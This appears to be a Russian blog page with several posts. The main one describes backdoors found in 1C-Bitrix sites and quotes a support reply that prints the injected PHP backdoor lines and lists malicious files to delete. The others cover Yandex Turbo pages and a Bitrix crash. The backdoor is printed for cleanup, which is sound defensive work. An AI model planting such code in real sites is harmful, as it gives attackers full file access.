Всем привет!

Уже на третьем сайте под управлением CMS Битрикс (разные лицензии) обнаруживаю одни и те-же бэкдоры и трояны, причём непосредственно в файлах движка Битрикса!
Инструмент монитор качества «Ядро проекта не модифицировалось» такие файлы не ловит т.к. это не модифицированные, а просто левые файлы.
Но вот почему модификацию /bitrix/modules/main/include.php не находит — уже вопрос
Вообще файлик этот довольно мутный — в нём присутствует обфуцированный код, причём легальный — от конторы 1С Битрикс. (что и раздражает — вирусу легко можно спрятаться под этот код)

На крайнем проекте уже не выдержал и написал в саппорт вопрос о технологии поиска лишних файлов, на что получил не совсем то, что хотел, но думаю для поиска таких типичных вирусов это неплохая инструкция (вообще думаю в движке была дырка, которая не афишируется, через которую и произошла иньекция — т.к. сайты абсолютно разные, а вирусятина одна и та же!)

ЦИТАТА
Добрый день!

Да, это вирус.

Вам необходимо:
1. Сделать полную резервную копию сайта.
2. Удалить restore.php из корня сайта.
3. Удалить посторонний скрипт /bitrix/js/main/core/core_loader.js
4. Отредактировать /bitrix/modules/main/include.php, удалив из него строчки:

require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec/include.php");

if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/restore.php",$_SERVER["DOCUMENT_ROOT"]."/restore.php");if($resu1t){die("ok");}else{die("fail");}}};


5. Удалить /bitrix/gadgets/bitrix/weather/lang/ru/exec/include.php и /bitrix/tools/check_files.php

если открывается http:// сайт /?utm_term=version — ваш сайт взломан с полным управлением у злоумышленника!
если открывается http:// сайт /bitrix/js/main/core/core_loader.js — ваш сайт взломан с полным управлением у злоумышленника!
если в корне лежит restore.php (а его там раньше не было) — тоже самое!

Заражение в действии — злоумышленник получает полный файловый доступ к сайту!

Вот такая приколюха!

Что же такое турбо страницы?
Спросим у Яндекса 🙂

Углубляться в подключение и настройке турбо страниц я не буду — вся технология очень доходчиво изложена на Яндексе tech.yandex.ru/turbo/ с множеством примеров и очень хорошей документацией.

А вот обсудить вопросы влияния турбо страниц на поисковую выдачу — можно!
Хоть Яндекс официально заявляет, что технология не влияет (что кстати довольно сомнительно) — лично я считаю, что даже если на данный момент времени не влияет — в скором будущем влиять будет!

Скорость загрузки страниц — на выдачу влияет, и об этом официально объявлено и известно всем! Турбо страницы — технология мгновенной загрузки контента в поисковик (по сути обращения к сайту даже нет т.к. Яндекс всю информацию берёт из кэша, поэтому и получается так быстро! Складывая два этих факта получаем, что всё таки турбо страницы должны ранжироваться повыше обычных (по крайне мере в мобильной выдаче — собственно, ведь для неё турбо страницы и заточены).

В общем для движка онлайн аптек я такую технологию внедрил — и по запросу sexipower.ru Виагра в поисковой выдаче Яндекса с мобильного уже видим следующую картину

При клике на которую мгновенно прямо в Яндексе открывается Турбо страница с заранее подготовленным контентом!

Ни с того, ни с сего — начал падать сайт под управлением движка 1С Битрикс.
Никто ничего с сайтом не делает — сам валится и всё тут.
В логах веб сервера множество таких записей
«Cannot use output buffering in output buffering display handlers in /bitrix/modules/main/lib/data/cache.php»
Довольно много гуглил и пробовал — ничего не помогло, методом научного тыка вычислил, что проблема очень подозрительном файле ядра
/bitrix/modules/main/include.php
подозрительность в том, что 1. код частично закодирован! 2. файл самостоятельно обновляется!
я его с ядра другого сайта перезаписал — ошибка ушла, но через некоторое время он обновился до той же длинны, что и была — и бай бай сайту — снова так же ошибка с кэшем

Предположу, что там какой то код на счёт валидности лицензии и там то и разработчики что-то накосячили (скорее всего в эхо ушел какой то невидимый символ типа переноса строки)
Отправил запрос в саппорт — жду ответ!